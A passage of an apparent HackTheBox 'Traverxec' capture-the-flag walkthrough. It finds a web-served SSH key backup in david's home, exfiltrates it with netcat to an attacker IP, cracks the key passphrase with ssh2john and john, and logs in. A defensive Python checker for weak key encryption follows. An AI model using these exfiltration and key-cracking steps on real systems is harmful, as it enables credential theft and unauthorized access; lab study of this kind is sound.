4 www-data > david
Reading https://www.gsp.com/cgi-bin/man.cgi?section=8&topic=NHTTPD#HOMEDIRS
Trying out http://traverxec.htb/~david/: not allowed.
# HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www
This means public_www inside each user's home directory is what nostromo serves.
Trying out /home/~david/public_www
cd /home/david/public_www
ls -la
total 16
drwxr-xr-x 3 david david 4096 Oct 25 2019 .
drwx--x--x 5 david david 4096 Oct 25 2019 ..
-rw-r--r-- 1 david david 402 Oct 25 2019 index.html
drwxr-xr-x 2 david david 4096 Oct 25 2019 protected-file-area
cd protected-file-area
ls -la
total 16
drwxr-xr-x 2 david david 4096 Oct 25 2019 .
drwxr-xr-x 3 david david 4096 Oct 25 2019 ..
-rw-r--r-- 1 david david 45 Oct 25 2019 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25 2019 backup-ssh-identity-files.tgz
cat .htaccess
realm David's Protected File Area. Keep out!
Transferring backup-ssh-identity-files.tgz over to kali
www-data@traverxec:/home/david/public_www/protected-file-area$ nc -w 3 10.10.16.161 1234 < backup-ssh-identity-files.tgz
$ tar xvf backup.tgz
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
NOTE: ssh -i id_rsa does not work; it still asks for a password.
┌──(kashz㉿kali)-[~/…/traverxec/home/david/.ssh]
└─$ /usr/share/john/ssh2john.py id_rsa > ssh.hash
┌──(kashz㉿kali)-[~/…/traverxec/home/david/.ssh]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (id_rsa)
$ ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$ whoami;id
david
uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
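The john output above reports KDF cost 0 (MD5/AES) with an iteration count of 1, which is the legacy PEM key format: the passphrase is stretched with a single MD5 pass, so a wordlist run is very cheap. The following is an added example, not part of the original notes: a defender-side check that reads a private key file's header and reports which passphrase protection it uses. The function names and both sample keys are constructed for illustration (headers only, no real key material).

```python
import base64, re, struct

MAGIC = b"openssh-key-v1\x00"

def _s(b):
    """Encode bytes as an SSH wire-format string (uint32 length + data)."""
    return struct.pack(">I", len(b)) + b

def _read(buf, off):
    """Decode one SSH wire-format string, returning (data, next_offset)."""
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n

def classify_private_key(pem):
    """Report how an SSH private key file is passphrase-protected."""
    m = re.search(r"-----BEGIN (RSA|DSA|EC|OPENSSH) PRIVATE KEY-----(.*?)-----END", pem, re.S)
    if not m:
        return {"format": "unknown"}
    label, body = m.group(1), m.group(2)
    if label == "OPENSSH":
        raw = base64.b64decode("".join(body.split()))
        if not raw.startswith(MAGIC):
            return {"format": "unknown"}
        cipher, off = _read(raw, len(MAGIC))   # ciphername
        kdf, off = _read(raw, off)             # kdfname
        opts, _ = _read(raw, off)              # kdfoptions: salt + rounds
        rounds = 0
        if kdf == b"bcrypt":
            _salt, o = _read(opts, 0)
            (rounds,) = struct.unpack_from(">I", opts, o)
        return {"format": "openssh-v1", "encrypted": cipher != b"none",
                "kdf": kdf.decode(), "rounds": rounds}
    # Legacy PEM: encryption is declared in Proc-Type / DEK-Info headers and
    # the key is derived from the passphrase with one MD5-based pass.
    dek = re.search(r"^DEK-Info:\s*([A-Za-z0-9-]+),", body, re.M)
    if "Proc-Type: 4,ENCRYPTED" in body and dek:
        return {"format": "legacy-pem", "encrypted": True,
                "kdf": "md5-evp-bytestokey", "rounds": 1, "cipher": dek.group(1)}
    return {"format": "legacy-pem", "encrypted": False, "kdf": "none", "rounds": 0}

# Constructed samples: headers only, the bodies are not real keys.
LEGACY = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
          "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
          "QUJDRA==\n-----END RSA PRIVATE KEY-----\n")
_hdr = (MAGIC + _s(b"aes256-ctr") + _s(b"bcrypt")
        + _s(_s(b"\x00" * 16) + struct.pack(">I", 16)))  # 16 rounds, constructed
MODERN = ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(_hdr).decode()
          + "\n-----END OPENSSH PRIVATE KEY-----\n")

if __name__ == "__main__":
    for name, pem in (("legacy", LEGACY), ("modern", MODERN)):
        print(name, classify_private_key(pem))
```

A key reported as legacy-pem can be rewritten in the bcrypt-protected OpenSSH format with `ssh-keygen -p -o -a <rounds> -f <keyfile>`; a backup of private keys should not sit under a web-served directory either way.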